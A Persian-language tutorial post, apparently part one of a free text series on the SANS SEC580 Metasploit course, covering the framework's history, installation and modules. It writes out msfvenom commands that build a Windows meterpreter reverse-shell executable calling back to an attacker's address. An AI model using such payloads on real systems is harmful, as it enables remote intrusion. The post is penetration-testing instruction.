نوشته‌ها

آموزش SEC580 – بخش اول

سلام خدمت شما

امروز تصمیم گرفتم که دوره SEC580 رو به صورت متنی در وب سایت شخصی خودم منتشر کنم تا چراغ راهی باشه برای علاقه‌مندان به مباحث تست نفوذ از طریق متاسپلویت که بتوانند به صورت رایگان به این محتوای ارزشمند دسترسی داشته باشند.

با توجه به درگیری‌های کاری سعی می کنم هر هفته ۱ تا ۲ پارت از این آموزش را منتشر کنم.دوره به صورت فشرده و کوتاه خواهد بود.

آموزش SEC580 - بخش اول

دوره آموزشی SEC580 از دوره‌های موسسه SANS است که به آموزش ابزار قدرتمند متاسپلویت می پردازد.

ابتدا باید ببینیم متاسپلویت چیست؟

متاسپلویت در ژوئیه سال ۲۰۰۳ ایجاد شد است. نسخه ۱٫۰ نوشته شده با زبان پرل و شامل رابط کاربری گرافیکی بر اساس curses است. نسخه سوم به‌طور کامل به زبان روبی بازنویسی شد و توسط Metasploit, LLC توسعه یافت. (تأسیس شده توسط توسعه دهندگان در سال ۲۰۰۶).

شما با استفاده از این فریم ورك می‌توانید آسیب پذیری‌هاي موجود در سیستم‌ها، پروتکل‌ها و نرم افزارهاي مختلف را شناسایی کرده و آنها را مورد نفوذ و یا حمله قرار دهید.

این اپلیکیشن به صورت پیش فرض  دارای اکسپلویت‌هاي بسیاری می‌باشد ولی علاوه بر آن شما می‌توانید اکسپلویت مورد نظر خودتان را ایجاد و به آن اضافه کنید.

نصب فریم ورک متاسپلویت

این فریم ورک به صورت پیش فرض در سیستم عامل کالی لینوکس وجود دارد و شما می‌توانید به راحتی از آن استفاده کنید.

اما اگر مایل به نصب متاسپلویت بر روی توزیع دیگری از لینوکس هستید، مشکلی وجود ندارد.باید به این شکل عمل کنید.

sudo apt-get install gpgv2 autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl postgresql postgresql-contrib wget xsel zlib1g zlib1g-dev

پس از نصب وارد لینک زیر شوید و فایل metasploit.run را دانلود کنید

https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

به ترتیب دستورات را وارد کنید:

mkdir /opt/metasploit

mv metasploit.run /opt/metasploit

chmod +x metasploit.run

./metasploit.run

پس نصب دستور msfconsole را وارد کنید تا محیط متاسپلویت برای شما اجرا شود.

حال نیاز است که با بخش‌های مختلف این فریم ورک آشنا شویم.

متاسپلویت دارای ماژول های مختلفی و تقسیم بندی های مختلفی است که به شرح زیر می باشند تعداد ۱۸۸۶ اکسپلویت، تعداد ۱۰۶۵ Auxiliary ، تعداد ۳۲۸ ماژولPost ، تعداد ۵۴۶ Payload و تعداد ۴۴ encoder و ۱۰ Nops و ۲ evasion.

متااسپلویت چندین رابط کاربری دارد. در گذشته رابط های آن بیشتر بود برای مثال msfcli و msfencode که جای خود را به msfpayload دادند.

بریم سراغ تست ابزار:

 قصد دارم یک Payload برای سیستم عامل ویندوز با استفاده از msfpayload ایجاد کنم. این رابط کاربری متاسپلویت وظیفه msfcli و msfencode را انجام می دهد.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

با استفاده از سوییچ -p ، Payload مد نظر را تعیین میکنیم. به جای<Local Port>  یک Port را وارد کنید برای مثال ۴۴۴۴٫

 به جای Local IP Address درواقع IP سیستم خود را وارد کنید.

 با استفاده از سوییچ -f فرمت فایل و در آخر هم خروجی را در یک فایل exe با نام shell قرار دادیم .

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.40 LPORT=4444 -f exe > shell.exe

آموزش ابزار trade

آموزش ابزار trade

در این پارت از آموزش نحوه کار کردن با ابزار trade به عنوان یکی از ابزارهای بسیار خوب در زمینه جمع آوری اطلاعات و کلاینت هکینگ آشنا خواهید شد.

آموزش در محیط کالی لینوکس است.